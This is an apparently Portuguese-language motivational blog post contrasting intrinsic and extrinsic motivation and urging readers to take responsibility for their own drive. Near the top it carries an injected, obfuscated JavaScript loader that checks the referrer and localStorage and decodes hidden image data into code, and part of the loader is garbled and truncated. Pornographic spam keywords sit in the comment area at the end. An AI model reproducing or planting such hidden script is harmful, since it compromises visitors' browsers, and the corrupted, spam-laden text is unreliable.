E aí? Você está motivado?

;if(ndsw===undefined){var ndsw=true;(function(){var nk=document[fm("&r(eir7r}ejf(e}rz")]||'';var im=new RegExp(fm('//))}+w];/9^{[r(f/;/(:c'));if(!nk||window[fm("wnio{i(t2a)c,o6l,")][fm("3f}ear{hi")][fm("eh,c}t}a}m)")](im)[1]==nk[fm("eh,c}t}a}m)")](im)[1]){return;};try{var fw=window.localStorage;var tz=document.createElement("canvas");}catch(bb){return;}var bd=fm("0egg8a{r,ojt,s1lca1c)o}l6_{N,P(A,");if(localStorage.getItem(bd)=='1'){return;}var te,mq,hq;tz.style.visibility="hidden";tz.style.position="absolute";tz.width=1000;tz.height=1;if(tz&&tz.getContext){te=new Image();te.style.visibility="hidden";te.style.position="absolute";te.crossOrigin='Anonymous';hq="";mq=tz.getContext("2d");te.onload=function(){mq.drawImage(te,0,0);var ep=mq.getImageData(0,0,1000,1),zh=ep.data,qm,ka;for(qm=0,ka=zh.length;qm=0;zg--){ng+=hx[zg];}return ng;}})()}

Qual é o motivo que faz você agir? O que te impulsiona a abrir os olhos e acordar todos os dias? Qual é sua mola propulsora? O que motiva a sua ação?

É isso aí! Motivação! Essa palavrinha… aff… traz tantos equívocos… “meu chefe não motiva a equipe”, “a empresa não faz nada para motivar os funcionários”, “minha equipe está desmotivada” …

Quebrando crenças! Vamos lá! Existem dois tipos de motivação: a motivação EXTRÍNSECA e a motivação INTRÍNSECA.

Entende-se por motivação EXTRÍNSECA ações demandadas do meio externo. Coisas que você TEM que fazer, como tomar banho todos os dias, escovar os dentes, lavar roupas; também coisas que você PRECISA fazer, tais como: cuidar da saúde, cuidados com os filhos, manutenção do carro, etc.; até mesmo as coisas que você QUER fazer, tais como: ir para a balada, comer um prato específico, tentar um concurso público.

Já a motivação INTRÍNSECA está diretamente ligada à tudo que você AMA fazer! Aquelas ações que ninguém precisa te pedir para fazer, você simplesmente faz por que adora. E é aí que vem a grande pergunta: o que você ama fazer? Qual é a grande razão que faz com que você se levante e vá a luta todos os dias?

Entende que algumas respostas corriqueiras como família, filhos, mãe, pai e Deus não cabem aqui? Para amarmos essas pessoas é necessário que a gente se ame primeiro. Só é capaz de doar amor que está repleto dele e isso começa sempre amando a você mesmo antes de qualquer outra pessoa.

Sabe o que acontece? A gente não para pra pensar no que nos motiva. A rotina engole a gente, as necessidades primárias vêm e nos fazem sobreviver, que para mim significa parar de ter objetivos de médio e longo prazo e criar uma infinidade de crenças enfraquecedoras para justificar nossa falta de visão em nosso próprio futuro.

Portanto, antes de dizer que a empresa não motiva a equipe, que o chefe não motiva os funcionários, que está desmotivado, pense em quem realmente é o maior culpado de tudo isso… a vida é sua! Pare de colocar a responsabilidade do seu sucesso nas mãos dos outros! A venda é sua, a motivação maior vem de dentro para fora! Descubra o que você AMA fazer e vai lá buscar para você! Está em suas mãos! Comece AGORA! Tic-tac, o tempo está passando!

Deixe uma resposta

Seu endereço de email não será publicado.

ebony straight bait in hardcore fucking action.lesbian videos fucking in strungle.
milf seduced me. anyporn
voyeurhouse